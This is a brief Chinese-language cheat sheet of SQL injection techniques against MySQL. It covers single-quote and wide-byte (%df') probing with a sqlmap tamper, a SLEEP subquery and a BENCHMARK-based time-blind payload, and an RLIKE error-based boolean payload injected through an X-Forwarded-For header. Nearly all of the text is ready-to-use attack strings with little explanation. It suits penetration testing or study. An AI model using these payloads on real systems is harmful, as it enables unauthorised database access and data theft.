sql注入首先尝试单引号;当单引号不报错的时候,尝试宽字节注入%df'(--tamper=unmagicquotes)
1、时间盲注子查询(SELECT(SLEEP(5)))jHpa
Payload: id=1 AND 4301=BENCHMARK(5000000,MD5(0x67426a42))
2、rlike报错
当使用正则匹配时,使用REGEXP和NOT REGEXP操作符(或RLIKE和NOT RLIKE,功能是一样的)
rlike遇到特殊字符'('报错,char(40)为'(' ,0x28为'('
X-Forwarded-For: 127.0.0.1' RLIKE (SELECT (CASE WHEN (6719=6719) THEN 0x3132372e302e302e31 ELSE 0x28 END)) AND 'IIug'='IIug
MySQL 16进制转换: SELECT HEX('127.0.0.1')